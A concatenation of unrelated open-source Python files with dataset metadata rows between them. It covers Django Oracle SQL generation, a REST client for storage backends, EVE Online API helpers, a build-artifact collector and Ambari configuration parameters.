name = '"%s"' % truncate_name(name.upper(), self.max_name_length())
# Oracle puts the query text into a (query % args) construct, so % signs
# in names need to be escaped. The '%%' will be collapsed back to '%' at
# that stage so we aren't really making the name longer here.
name = name.replace('%', '%%')
return name.upper()
def random_function_sql(self):
return "DBMS_RANDOM.RANDOM"
def regex_lookup(self, lookup_type):
if lookup_type == 'regex':
match_option = "'c'"
else:
match_option = "'i'"
return 'REGEXP_LIKE(%%s, %%s, %s)' % match_option
def return_insert_id(self):
return "RETURNING %s INTO %%s", (InsertIdVar(),)
def savepoint_create_sql(self, sid):
return "SAVEPOINT " + self.quote_name(sid)
def savepoint_rollback_sql(self, sid):
return "ROLLBACK TO SAVEPOINT " + self.quote_name(sid)
    def _foreign_key_constraints(self, table_name, recursive=False):
        """Return (table_name, constraint_name) pairs of FK constraints.

        With recursive=False, only the FK constraints declared on
        *table_name* itself. With recursive=True, the FK constraints of every
        table that (transitively) references *table_name*, ordered with the
        most deeply dependent tables first.
        """
        with self.connection.cursor() as cursor:
            if recursive:
                cursor.execute("""
                    SELECT
                        user_tables.table_name, rcons.constraint_name
                    FROM
                        user_tables
                    JOIN
                        user_constraints cons
                        ON (user_tables.table_name = cons.table_name AND cons.constraint_type = ANY('P', 'U'))
                    LEFT JOIN
                        user_constraints rcons
                        ON (user_tables.table_name = rcons.table_name AND rcons.constraint_type = 'R')
                    START WITH user_tables.table_name = UPPER(%s)
                    CONNECT BY NOCYCLE PRIOR cons.constraint_name = rcons.r_constraint_name
                    GROUP BY
                        user_tables.table_name, rcons.constraint_name
                    HAVING user_tables.table_name != UPPER(%s)
                    ORDER BY MAX(level) DESC
                """, (table_name, table_name))
            else:
                cursor.execute("""
                    SELECT
                        cons.table_name, cons.constraint_name
                    FROM
                        user_constraints cons
                    WHERE
                        cons.constraint_type = 'R'
                        AND cons.table_name = UPPER(%s)
                """, (table_name,))
            return cursor.fetchall()
    def sql_flush(self, style, tables, sequences, allow_cascade=False):
        """Return a list of SQL statements that empty the given tables.

        Disables the relevant FK constraints, TRUNCATEs the tables,
        re-enables the constraints, then resets the sequences of the
        truncated tables.
        """
        if tables:
            truncated_tables = {table.upper() for table in tables}
            constraints = set()
            # Oracle's TRUNCATE CASCADE only works with ON DELETE CASCADE
            # foreign keys which Django doesn't define. Emulate the
            # PostgreSQL behavior which truncates all dependent tables by
            # manually retrieving all foreign key constraints and resolving
            # dependencies.
            for table in tables:
                for foreign_table, constraint in self._foreign_key_constraints(table, recursive=allow_cascade):
                    if allow_cascade:
                        truncated_tables.add(foreign_table)
                    constraints.add((foreign_table, constraint))
            sql = [
                "%s %s %s %s %s %s %s %s;" % (
                    style.SQL_KEYWORD('ALTER'),
                    style.SQL_KEYWORD('TABLE'),
                    style.SQL_FIELD(self.quote_name(table)),
                    style.SQL_KEYWORD('DISABLE'),
                    style.SQL_KEYWORD('CONSTRAINT'),
                    style.SQL_FIELD(self.quote_name(constraint)),
                    style.SQL_KEYWORD('KEEP'),
                    style.SQL_KEYWORD('INDEX'),
                ) for table, constraint in constraints
            ] + [
                "%s %s %s;" % (
                    style.SQL_KEYWORD('TRUNCATE'),
                    style.SQL_KEYWORD('TABLE'),
                    style.SQL_FIELD(self.quote_name(table)),
                ) for table in truncated_tables
            ] + [
                "%s %s %s %s %s %s;" % (
                    style.SQL_KEYWORD('ALTER'),
                    style.SQL_KEYWORD('TABLE'),
                    style.SQL_FIELD(self.quote_name(table)),
                    style.SQL_KEYWORD('ENABLE'),
                    style.SQL_KEYWORD('CONSTRAINT'),
                    style.SQL_FIELD(self.quote_name(constraint)),
                ) for table, constraint in constraints
            ]
            # Since we've just deleted all the rows, running our sequence
            # ALTER code will reset the sequence to 0.
            sql.extend(self.sequence_reset_by_name_sql(style, sequences))
            return sql
        else:
            return []
def sequence_reset_by_name_sql(self, style, sequences):
sql = []
for sequence_info in sequences:
no_autofield_sequence_name = self._get_no_autofield_sequence_name(sequence_info['table'])
table = self.quote_name(sequence_info['table'])
column = self.quote_name(sequence_info['column'] or 'id')
query = self._sequence_reset_sql % {
'no_autofield_sequence_name': no_autofield_sequence_name,
'table': table,
'column': column,
'table_name': strip_quotes(table),
'column_name': strip_quotes(column),
}
sql.append(query)
return sql
    def sequence_reset_sql(self, style, model_list):
        """Return PL/SQL statements resyncing sequences for the given models.

        Covers each model's AutoField (at most one per model) and the
        implicit 'id' column of auto-created many-to-many through tables.
        """
        from django.db import models
        output = []
        query = self._sequence_reset_sql
        for model in model_list:
            for f in model._meta.local_fields:
                if isinstance(f, models.AutoField):
                    no_autofield_sequence_name = self._get_no_autofield_sequence_name(model._meta.db_table)
                    table = self.quote_name(model._meta.db_table)
                    column = self.quote_name(f.column)
                    output.append(query % {
                        'no_autofield_sequence_name': no_autofield_sequence_name,
                        'table': table,
                        'column': column,
                        'table_name': strip_quotes(table),
                        'column_name': strip_quotes(column),
                    })
                    # Only one AutoField is allowed per model, so don't
                    # continue to loop
                    break
            for f in model._meta.many_to_many:
                if not f.remote_field.through:
                    no_autofield_sequence_name = self._get_no_autofield_sequence_name(f.m2m_db_table())
                    table = self.quote_name(f.m2m_db_table())
                    column = self.quote_name('id')
                    output.append(query % {
                        'no_autofield_sequence_name': no_autofield_sequence_name,
                        'table': table,
                        'column': column,
                        'table_name': strip_quotes(table),
                        'column_name': 'ID',
                    })
        return output
def start_transaction_sql(self):
return ''
def tablespace_sql(self, tablespace, inline=False):
if inline:
return "USING INDEX TABLESPACE %s" % self.quote_name(tablespace)
else:
return "TABLESPACE %s" % self.quote_name(tablespace)
def adapt_datefield_value(self, value):
"""
Transform a date value to an object compatible with what is expected
by the backend driver for date columns.
The default implementation transforms the date to text, but that is not
necessary for Oracle.
"""
return value
def adapt_datetimefield_value(self, value):
"""
Transform a datetime value to an object compatible with what is expected
by the backend driver for datetime columns.
If naive datetime is passed assumes that is in UTC. Normally Django
models.DateTimeField makes sure that if USE_TZ is True passed datetime
is timezone aware.
"""
if value is None:
return None
# Expression values are adapted by the database.
if hasattr(value, 'resolve_expression'):
return value
# cx_Oracle doesn't support tz-aware datetimes
if timezone.is_aware(value):
if settings.USE_TZ:
value = timezone.make_naive(value, self.connection.timezone)
else:
raise ValueError("Oracle backend does not support timezone-aware datetimes when USE_TZ is False.")
return Oracle_datetime.from_datetime(value)
def adapt_timefield_value(self, value):
if value is None:
return None
# Expression values are adapted by the database.
if hasattr(value, 'resolve_expression'):
return value
if isinstance(value, str):
return datetime.datetime.strptime(value, '%H:%M:%S')
# Oracle doesn't support tz-aware times
if timezone.is_aware(value):
raise ValueError("Oracle backend does not support timezone-aware times.")
return Oracle_datetime(1900, 1, 1, value.hour, value.minute,
value.second, value.microsecond)
def combine_expression(self, connector, sub_expressions):
lhs, rhs = sub_expressions
if connector == '%%':
return 'MOD(%s)' % ','.join(sub_expressions)
elif connector == '&':
return 'BITAND(%s)' % ','.join(sub_expressions)
elif connector == '|':
return 'BITAND(-%(lhs)s-1,%(rhs)s)+%(lhs)s' % {'lhs': lhs, 'rhs': rhs}
elif connector == '<<':
return '(%(lhs)s * POWER(2, %(rhs)s))' % {'lhs': lhs, 'rhs': rhs}
elif connector == '>>':
return 'FLOOR(%(lhs)s / POWER(2, %(rhs)s))' % {'lhs': lhs, 'rhs': rhs}
elif connector == '^':
return 'POWER(%s)' % ','.join(sub_expressions)
return super().combine_expression(connector, sub_expressions)
def _get_no_autofield_sequence_name(self, table):
"""
Manually created sequence name to keep backward compatibility for
AutoFields that aren't Oracle identity columns.
"""
name_length = self.max_name_length() - 3
return '%s_SQ' % truncate_name(strip_quotes(table), name_length).upper()
def _get_sequence_name(self, cursor, table, pk_name):
cursor.execute("""
SELECT sequence_name
FROM user_tab_identity_cols
WHERE table_name = UPPER(%s)
AND column_name = UPPER(%s)""", [table, pk_name])
row = cursor.fetchone()
return self._get_no_autofield_sequence_name(table) if row is None else row[0]
    def bulk_insert_sql(self, fields, placeholder_rows):
        """Build the VALUES part of a bulk INSERT as a UNION ALL of SELECTs.

        Oracle has no multi-row VALUES syntax, so each row becomes a
        SELECT ... FROM DUAL.
        """
        query = []
        for row in placeholder_rows:
            select = []
            for i, placeholder in enumerate(row):
                # A model without any fields has fields=[None].
                if fields[i]:
                    internal_type = getattr(fields[i], 'target_field', fields[i]).get_internal_type()
                    placeholder = BulkInsertMapper.types.get(internal_type, '%s') % placeholder
                # Add columns aliases to the first select to avoid "ORA-00918:
                # column ambiguously defined" when two or more columns in the
                # first select have the same value.
                if not query:
                    placeholder = '%s col_%s' % (placeholder, i)
                select.append(placeholder)
            query.append('SELECT %s FROM DUAL' % ', '.join(select))
        # Bulk insert to tables with Oracle identity columns causes Oracle to
        # add sequence.nextval to it. Sequence.nextval cannot be used with the
        # UNION operator. To prevent incorrect SQL, move UNION to a subquery.
        return 'SELECT * FROM (%s)' % ' UNION ALL '.join(query)
def subtract_temporals(self, internal_type, lhs, rhs):
if internal_type == 'DateField':
lhs_sql, lhs_params = lhs
rhs_sql, rhs_params = rhs
return "NUMTODSINTERVAL(%s - %s, 'DAY')" % (lhs_sql, rhs_sql), lhs_params + rhs_params
return super().subtract_temporals(internal_type, lhs, rhs)
def bulk_batch_size(self, fields, objs):
"""Oracle restricts the number of parameters in a query."""
if fields:
return self.connection.features.max_query_params // len(fields)
return len(objs)
| 42.496491 | 114 | 0.604467 |
83d5dfd794584f53604636f4890915dd10f0932b | 700 | py | Python | ocean/{{projectNameShort}}/{{projectNameShort}}/parallel.py | surfstudio/ocean | 99c036c7cbcd4f0fe496bb72acdc54db8adb637a | [
"MIT"
] | 17 | 2019-07-09T12:46:17.000Z | 2021-05-24T08:24:27.000Z | ocean/{{projectNameShort}}/{{projectNameShort}}/parallel.py | EnlightenedCSF/Ocean | 99c036c7cbcd4f0fe496bb72acdc54db8adb637a | [
"MIT"
] | 2 | 2019-07-11T09:06:49.000Z | 2019-07-11T09:33:38.000Z | ocean/{{projectNameShort}}/{{projectNameShort}}/parallel.py | EnlightenedCSF/Ocean | 99c036c7cbcd4f0fe496bb72acdc54db8adb637a | [
"MIT"
] | 4 | 2019-07-25T07:43:56.000Z | 2020-02-18T19:32:57.000Z | from multiprocessing import Pool, cpu_count
import numpy as np
def parallelize(data, func, n_threads: int = None) -> np.ndarray:
    """
    **Applies function to an array in multiple worker processes**

    :param data: np.array or pd.Series of data.
    :param func: function applied to each chunk (receives a sub-array and
        must return an array-like of results). It must be picklable.
    :param n_threads: number of parallel worker processes; defaults to
        cpu_count().
    :return: np.ndarray with the concatenated results, in input order.
    """
    # `np.array` is a function, not a type, so the return annotation is
    # np.ndarray. One chunk per worker, as before.
    workers = cpu_count() if n_threads is None else n_threads
    chunks = np.array_split(data, workers)
    pool = Pool(workers)
    try:
        # imap preserves chunk order, so the concatenation matches the input.
        result = np.concatenate(list(pool.imap(func, chunks)))
    finally:
        # Always release the worker processes, even if func raises.
        pool.close()
        pool.join()
    return result
| 30.434783 | 91 | 0.654286 |
80b79420810409c42bf80ae0dbea638ae9434297 | 4,276 | py | Python | delfin/drivers/utils/rest_client.py | niteesh1215/delfin | 89cb0e9ee2b673dcca09e1d4754c45eef3fa46a0 | [
"Apache-2.0"
] | 1 | 2021-12-14T06:42:00.000Z | 2021-12-14T06:42:00.000Z | delfin/drivers/utils/rest_client.py | niteesh1215/delfin | 89cb0e9ee2b673dcca09e1d4754c45eef3fa46a0 | [
"Apache-2.0"
] | null | null | null | delfin/drivers/utils/rest_client.py | niteesh1215/delfin | 89cb0e9ee2b673dcca09e1d4754c45eef3fa46a0 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 The SODA Authors.
# Copyright (c) 2016 Huawei Technologies Co., Ltd.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import requests
import six
from oslo_log import log as logging
from delfin import exception
from delfin import ssl_utils
from delfin.drivers.hpe.hpe_3par import consts
from delfin.i18n import _
LOG = logging.getLogger(__name__)
class RestClient(object):
def __init__(self, **kwargs):
rest_access = kwargs.get('rest')
if rest_access is None:
raise exception.InvalidInput('Input rest_access is missing')
self.rest_host = rest_access.get('host')
self.rest_port = rest_access.get('port')
self.rest_username = rest_access.get('username')
self.rest_password = rest_access.get('password')
self.san_address = 'https://%s:%s' % \
(self.rest_host, str(self.rest_port))
self.session = None
self.device_id = None
self.verify = kwargs.get('verify', False)
self.rest_auth_token = None
    def init_http_head(self):
        """(Re)create the requests session with JSON headers and TLS settings."""
        if self.session:
            self.session.close()
        self.session = requests.Session()
        self.session.headers.update({
            "Connection": "keep-alive",
            'Accept': 'application/json',
            "Content-Type": "application/json"})
        if not self.verify:
            self.session.verify = False
        else:
            LOG.debug("Enable certificate verification, ca_path: {0}".format(
                self.verify))
            self.session.verify = self.verify
        # Don't pick up proxy/CA settings from environment variables.
        self.session.trust_env = False
        # Adapter that ignores host-name mismatches during TLS verification.
        self.session.mount("https://",
                           ssl_utils.get_host_name_ignore_adapter())
    def do_call(self, url, data, method,
                calltimeout=consts.SOCKET_TIMEOUT):
        """Send an HTTP request to the storage backend.

        :param url: absolute URL, or a path appended to self.san_address.
        :param data: request payload; JSON-encoded when truthy.
        :param method: one of 'POST', 'PUT', 'GET', 'DELETE'.
        :param calltimeout: socket timeout in seconds.
        :return: the requests.Response object.
        :raises exception.StorageBackendException: on invalid method or
            read timeouts.
        :raises exception.InvalidIpOrPort, exception.ConnectTimeout,
            exception.SSLCertificateFailed, exception.SSLHandshakeFailed,
            exception.BadResponse: mapped from the underlying request errors.
        """
        if 'http' not in url:
            if self.san_address:
                url = '%s%s' % (self.san_address, url)
        kwargs = {'timeout': calltimeout}
        if data:
            kwargs['data'] = json.dumps(data)
        if method in ('POST', 'PUT', 'GET', 'DELETE'):
            func = getattr(self.session, method.lower())
        else:
            msg = _("Request method %s is invalid.") % method
            LOG.error(msg)
            raise exception.StorageBackendException(msg)
        res = None
        try:
            res = func(url, **kwargs)
        except requests.exceptions.ConnectTimeout as ct:
            LOG.error('Connect Timeout err: {}'.format(ct))
            raise exception.InvalidIpOrPort()
        except requests.exceptions.ReadTimeout as rt:
            LOG.error('Read timed out err: {}'.format(rt))
            raise exception.StorageBackendException(six.text_type(rt))
        except requests.exceptions.SSLError as e:
            LOG.error('SSLError for %s %s' % (method, url))
            err_str = six.text_type(e)
            if 'certificate verify failed' in err_str:
                raise exception.SSLCertificateFailed()
            else:
                raise exception.SSLHandshakeFailed()
        except Exception as err:
            LOG.exception('Bad response from server: %(url)s.'
                          ' Error: %(err)s', {'url': url, 'err': err})
            # Classify generic failures by message text, since requests wraps
            # the underlying socket errors.
            if 'WSAETIMEDOUT' in str(err):
                raise exception.ConnectTimeout()
            elif 'Failed to establish a new connection' in str(err):
                LOG.error('Failed to establish: {}'.format(err))
                raise exception.InvalidIpOrPort()
            elif 'Read timed out' in str(err):
                raise exception.StorageBackendException(six.text_type(err))
            else:
                raise exception.BadResponse()
        return res
| 37.840708 | 78 | 0.605239 |
3c7d9b078f6d5942f2304e245df84aa5785a5ced | 840 | py | Python | test/news_test.py | hu00xp/tushare | 3bd28bad1a3445ac5f9fe2b0d1647dbd3114ed28 | [
"BSD-3-Clause"
] | 20 | 2017-11-23T12:18:28.000Z | 2021-03-15T15:15:56.000Z | test/news_test.py | boblee2000/tushare | 3bd28bad1a3445ac5f9fe2b0d1647dbd3114ed28 | [
"BSD-3-Clause"
] | 1 | 2021-12-13T20:52:05.000Z | 2021-12-13T20:52:05.000Z | test/news_test.py | boblee2000/tushare | 3bd28bad1a3445ac5f9fe2b0d1647dbd3114ed28 | [
"BSD-3-Clause"
] | 12 | 2017-11-21T01:39:47.000Z | 2021-03-15T15:15:57.000Z | # -*- coding:utf-8 -*-
'''
Created on 2015/3/14
@author: Jimmy Liu
'''
import unittest
import tushare.stock.newsevent as fd
class Test(unittest.TestCase):
    """Smoke tests for tushare.stock.newsevent (fetches live data)."""

    def set_data(self):
        """Shared fixture values; called explicitly by each test."""
        self.code = '600848'
        self.start = '2015-01-03'
        self.end = '2015-04-07'
        self.year = 2014
        self.quarter = 4
        self.top = 60
        self.show_content = True

    def test_get_latest_news(self):
        self.set_data()
        print(fd.get_latest_news(self.top, self.show_content))

    def test_get_notices(self):
        self.set_data()
        df = fd.get_notices(self.code)
        # DataFrame.ix was removed in pandas 1.0; .iloc[0] is the positional
        # equivalent for the first notice row.
        print(fd.notice_content(df.iloc[0]['url']))

    def test_guba_sina(self):
        self.set_data()
        print(fd.guba_sina(self.show_content))
# Allow running this test module directly: python news_test.py
if __name__ == "__main__":
    unittest.main()
43ebbbeb3e772cce8ecc0fb4c6b7945acfc42285 | 1,924 | py | Python | src/eyeson/translators.py | sapporojones/eyeson | 129c3bda4c0bdf562aab4d8072a20c667ff9b4b3 | [
"MIT"
] | null | null | null | src/eyeson/translators.py | sapporojones/eyeson | 129c3bda4c0bdf562aab4d8072a20c667ff9b4b3 | [
"MIT"
] | 43 | 2021-06-30T22:27:15.000Z | 2022-03-16T23:14:28.000Z | src/eyeson/translators.py | sapporojones/eyeson | 129c3bda4c0bdf562aab4d8072a20c667ff9b4b3 | [
"MIT"
] | null | null | null | import argparse
import calendar
import datetime
import time
import requests
import json
from rich.console import Console
from rich.table import Table
def timestamper(timestamp):
    """
    Converts a UTC kill timestamp into an "XhYmZs ago" age string.

    :param timestamp: formatted like "2021-06-04T01:25:26Z"
    :return: formatted f string containing time data
    """
    # Parse the ISO-8601 'Z' form as a naive UTC datetime.
    killtime = datetime.datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%SZ")
    nowsecs = calendar.timegm(time.gmtime())
    nowstamp = datetime.datetime.utcfromtimestamp(nowsecs)
    tdelta = nowstamp - killtime
    # Derive whole hours/minutes/seconds directly: the old approach split
    # str(timedelta) on ':', which breaks for deltas >= 24h (the string
    # becomes "N days, H:MM:SS") and leaks microseconds into the seconds.
    total_seconds = int(tdelta.total_seconds())
    hours, remainder = divmod(total_seconds, 3600)
    minutes, seconds = divmod(remainder, 60)
    return f"{hours}h {minutes}m {seconds}s ago"
def name2id(sys_name):
    """
    Converts a Solar System name to Solar System ID via ESI search.

    :param sys_name: String value name of the system such as "Jita" or "D-PNP9"
    :return: system_id: the ID value of the provided system name.
    """
    search_url = "https://esi.evetech.net/latest/search/"
    params = {
        "categories": "solar_system",
        "datasource": "tranquility",
        "language": "en",
        # Let requests URL-encode the name; the old hand-built URL also
        # appended a stray trailing space to the search term.
        "search": sys_name,
    }
    search_object = requests.get(search_url, params=params)
    search_json = search_object.json()
    system_id = search_json["solar_system"][0]
    return system_id
def id2name(sys_id):
    """
    Helper function to convert system IDs to name for verification purposes.

    :param sys_id: the integer value ID of the system to be checked
    :return: system_name: the string name of the system
    """
    url = f"https://esi.evetech.net/latest/universe/systems/{sys_id}/"
    response = requests.get(url)
    payload = response.json()
    return payload["name"]
| 29.6 | 108 | 0.691788 |
b764fbaf4278631741084a2f89b346ec441fd498 | 4,706 | py | Python | gitlab-ci/src/artifacts/collector.py | ninegua/ic | fb3fe3ff87ce413a79f267ece80ae78f0f8b00fd | [
"Apache-2.0"
] | 1 | 2021-11-19T18:45:44.000Z | 2021-11-19T18:45:44.000Z | gitlab-ci/src/artifacts/collector.py | ninegua/ic | fb3fe3ff87ce413a79f267ece80ae78f0f8b00fd | [
"Apache-2.0"
] | null | null | null | gitlab-ci/src/artifacts/collector.py | ninegua/ic | fb3fe3ff87ce413a79f267ece80ae78f0f8b00fd | [
"Apache-2.0"
] | null | null | null | import logging
import multiprocessing
import os
import shutil
import tempfile
from os import path
from typing import List
from ci import cwd
from ci import ENV
from ci import log_section
from ci import mkdir_p
from ci import sh
def local(v: str) -> str:
    """Resolve *v* relative to the repository's gitlab-ci/src/artifacts directory."""
    scripts_root = path.join(ENV.top, "gitlab-ci/src/artifacts")
    return path.join(scripts_root, v)
# Names of the Rust release binaries collected into ARTIFACTS_DIR
# (each one is gzipped by Collector._process_one; missing ones are skipped).
RUST_BINARIES = [
"boundary-node-control-plane",
"boundary-node-prober",
"canister_sandbox",
"e2e-test-driver",
"ic-admin",
"ic-btc-adapter",
"ic-canister-http-adapter",
"ic-consensus-pool-util",
"ic-crypto-csp",
"ic-cup-explorer",
"ic-get-neuron-ids",
"ic-nns-init",
"ic-p8s-service-discovery",
"ic-p8s-sd",
"ic-prep",
"ic-recovery",
"ic-regedit",
"ic-replay",
"ic-rosetta-api",
"ic-starter",
"ic-test-bin",
"ic-workload-generator",
"orchestrator",
"prod-test-driver",
"replica",
"sandbox_launcher",
"state-tool",
"system-tests",
"vsock_agent",
]
# Binaries whose debug info must be kept (Collector._strip skips these).
DONT_STRIP = ["replica", "canister_sandbox"]
# Nix store reference patterns allowed to remain in stripped binaries,
# keyed by build target triple (used only when REALLY_STRIP is set).
STRIP_REFS = {
"x86_64-unknown-linux-gnu": [
"*-glibc-*",
"*-gcc-*",
"*-openssl-*",
"*-libidn2-*",
"*-binutils-*",
"*-crates-io",
],
"x86_64-apple-darwin": ["*-crates-io", "*-swift-corefoundation", "*-openssl-*"],
}
class Collector:
    """A script that collects a list of binaries, performs various transformations on them (see below), and puts them in `ARTIFACTS_DIR` so GitLab can detect and upload them."""

    artifacts_dir: str
    files: List[str]

    def __init__(
        self,
        artifacts_dir="artifacts/nix-release",
        files=RUST_BINARIES,
    ) -> None:
        self.artifacts_dir = artifacts_dir
        self.files = files
        # Scratch directory where each binary is copied before processing.
        self.temp = tempfile.mkdtemp()

    @classmethod
    def collect(cls, artifacts_dir="artifacts/nix-release", files=RUST_BINARIES):
        """Convenience entry point: build a Collector and run it inside a log section."""
        with log_section("Click here to see artifact processing output"):
            cls(artifacts_dir, files).run()

    def run(self):
        """Process every binary in parallel, then optionally sign the output dir."""
        with cwd(ENV.top):
            # This is the directory GitLab searches for artifacts once the job has completed
            self.out_dir = path.join(ENV.top, self.artifacts_dir)
            mkdir_p(self.out_dir)

            p = multiprocessing.Pool()
            try:
                p.map(self._process_one, self.files)
                # FIX: release the worker processes on the success path too;
                # previously they were only reaped on KeyboardInterrupt.
                p.close()
                p.join()
            except KeyboardInterrupt:
                p.terminate()
                p.join()
                raise

            # Malicious (test-only) build flavors are deliberately left unsigned.
            if "malicious" in self.artifacts_dir:
                return

            if path.exists("/openssl/private.pem"):
                sh(local("openssl-sign.sh"), self.out_dir)
            else:
                # FIX: logging.warn is a deprecated alias of logging.warning.
                logging.warning(
                    "/openssl/private.pem doesn't exist, so these artifacts won't be signed"
                )

    def _process_one(self, binary: str):
        """
        Things we do in here:

        * Strip debuginfo from the binaries (using objcopy or strip)
        * On Linux, run patchelf, so binaries built in nix-shell can run on other systems
        * On Darwin, fix dylibs, which accomplishes the same goal as the previous bullet point
        * If REALLY_STRIP is set, strip Nix store references and fail if there are any we don't recognize (disabled right now because the nix shell path ends up in every rpath for some reason)
        """
        src_path = path.join(ENV.target_dir, ENV.build_target, "release", binary)
        bin_path = path.join(self.temp, binary)
        if not os.access(src_path, os.R_OK):
            # Not every binary is produced by every build flavor; skip quietly.
            logging.info(f"Binary not found at {src_path}")
            return
        shutil.copyfile(src_path, bin_path)
        if binary not in DONT_STRIP:
            self._strip(bin_path)
        self._adjust_paths(bin_path)
        self._strip_refs(bin_path)
        # Compress reproducibly (--no-name drops the timestamp/filename header).
        sh("pigz", "-c", "--no-name", bin_path, pipe_to=path.join(self.out_dir, f"{binary}.gz"))

    def _strip(self, in_path: str):
        """Remove debug info (plus noisy ELF sections on Linux)."""
        if ENV.is_linux:
            sh("objcopy", "-D", "--strip-debug", "-R", ".comment", "-R", ".note.gnu.build-id", in_path)
        elif ENV.is_macos:
            sh("strip", "-S", in_path)

    def _adjust_paths(self, in_path: str):
        """Make the binary runnable outside the Nix build environment."""
        if ENV.is_linux:
            sh(
                "patchelf",
                "--remove-rpath",
                "--set-interpreter",
                "/lib64/ld-linux-x86-64.so.2",
                in_path,
            )
        else:
            sh(local("relocate-darwin-syslibs.sh"), in_path)

    def _strip_refs(self, in_path: str):
        """Optionally remove Nix store references (opt-in via REALLY_STRIP)."""
        if "REALLY_STRIP" in os.environ:
            sh(
                local("strip-references.sh"),
                in_path,
                env={"allowedStrippedRefs": " ".join(STRIP_REFS[ENV.build_target])},
            )
| 29.229814 | 192 | 0.584573 |
65187487fcc85c0e9032767e449d623afafd0d1a | 4,646 | py | Python | install/ambari-installer/traf-mpack/common-services/TRAFODION/2.1/package/scripts/params.py | anoopsharma00/incubator-trafodion | b109e2cf5883f8e763af853ab6fad7ce7110d9e8 | [
"Apache-2.0"
] | null | null | null | install/ambari-installer/traf-mpack/common-services/TRAFODION/2.1/package/scripts/params.py | anoopsharma00/incubator-trafodion | b109e2cf5883f8e763af853ab6fad7ce7110d9e8 | [
"Apache-2.0"
] | null | null | null | install/ambari-installer/traf-mpack/common-services/TRAFODION/2.1/package/scripts/params.py | anoopsharma00/incubator-trafodion | b109e2cf5883f8e763af853ab6fad7ce7110d9e8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# @@@ START COPYRIGHT @@@
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# @@@ END COPYRIGHT @@@
from resource_management import *
# config object that holds the configurations declared in the config xml file
config = Script.get_config()

# JVM environment reported by Ambari.
java_home = config['hostLevelParams']['java_home']
java_version = int(config['hostLevelParams']['java_version'])
cluster_name = str(config['clusterName'])

# DCS (Database Connectivity Services) settings.
dcs_servers = config['configurations']['dcs-env']['dcs.servers']
dcs_master_port = config['configurations']['dcs-site']['dcs.master.port']
dcs_info_port = config['configurations']['dcs-site']['dcs.master.info.port']
dcs_floating_ip = config['configurations']['dcs-site']['dcs.master.floating.ip.external.ip.address']
dcs_mast_node_list = default("/clusterHostInfo/traf_dcs_prime_hosts", '')
dcs_back_node_list = default("/clusterHostInfo/traf_dcs_second_hosts", '')
dcs_env_template = config['configurations']['dcs-env']['content']
dcs_log4j_template = config['configurations']['dcs-log4j']['content']

# ZooKeeper quorum; fall back to the default client port when zoo.cfg is absent.
zookeeper_quorum_hosts = ",".join(config['clusterHostInfo']['zookeeper_hosts'])
if 'zoo.cfg' in config['configurations'] and 'clientPort' in config['configurations']['zoo.cfg']:
    zookeeper_clientPort = config['configurations']['zoo.cfg']['clientPort']
else:
    zookeeper_clientPort = '2181'

# Trafodion user/environment settings.
traf_db_admin = config['configurations']['trafodion-env']['traf.db.admin']
traf_conf_dir = '/etc/trafodion/conf' # path is hard-coded in /etc/trafodion/trafodion_config
traf_env_template = config['configurations']['trafodion-env']['content']
traf_clust_template = config['configurations']['traf-cluster-env']['content']
traf_user = 'trafodion'
traf_group = 'trafodion'
hdfs_user = config['configurations']['hadoop-env']['hdfs_user']
hbase_user = config['configurations']['hbase-env']['hbase_user']
hbase_staging = config['configurations']['hbase-site']['hbase.bulkload.staging.dir']
traf_priv_key = config['configurations']['trafodion-env']['traf.sshkey.priv']
traf_node_list = default("/clusterHostInfo/traf_node_hosts", '')
traf_scratch = config['configurations']['trafodion-env']['traf.node.dir']

# LDAP settings; hosts/identifiers are rendered one "key: value" line per
# delimiter-separated entry of the raw config string.
traf_ldap_template = config['configurations']['trafodion-env']['ldap_content']
traf_ldap_enabled = config['configurations']['trafodion-env']['traf.ldap.enabled']
ldap_hosts = ''.join(
    ' LDAPHostName: %s\n' % host
    for host in config['configurations']['trafodion-env']['traf.ldap.hosts'].split(',')
)
ldap_port = config['configurations']['trafodion-env']['traf.ldap.port']
ldap_identifiers = ''.join(
    ' UniqueIdentifier: %s\n' % identifier
    for identifier in config['configurations']['trafodion-env']['traf.ldap.identifiers'].split(';')
)
ldap_user = config['configurations']['trafodion-env']['traf.ldap.user']
ldap_pwd = config['configurations']['trafodion-env']['traf.ldap.pwd']
ldap_encrypt = config['configurations']['trafodion-env']['traf.ldap.encrypt']
ldap_certpath = config['configurations']['trafodion-env']['traf.ldap.certpath']

#HDFS Dir creation
hostname = config["hostname"]
hadoop_conf_dir = "/etc/hadoop/conf"
hdfs_user_keytab = config['configurations']['hadoop-env']['hdfs_user_keytab']
security_enabled = config['configurations']['cluster-env']['security_enabled']
kinit_path_local = functions.get_kinit_path(default('/configurations/kerberos-env/executable_search_paths', None))
hdfs_site = config['configurations']['hdfs-site']
default_fs = config['configurations']['core-site']['fs.defaultFS']

import functools
#create partial functions with common arguments for every HdfsDirectory call
#to create hdfs directory we need to call params.HdfsDirectory in code
HdfsDirectory = functools.partial(
    HdfsResource,
    type="directory",
    hadoop_conf_dir=hadoop_conf_dir,
    user=hdfs_user,
    hdfs_site=hdfs_site,
    default_fs=default_fs,
    security_enabled=security_enabled,
    keytab=hdfs_user_keytab,
    kinit_path_local=kinit_path_local,
)
| 45.54902 | 114 | 0.759793 |
5ae36b07fe2ff64762983b3ebf9523d62de9d6a2 | 21,076 | py | Python | tests/test_handlers.py | p1-gdd/django-axes | 813a8518bc7306988492fdafdf38c0cd887f1129 | [
"MIT"
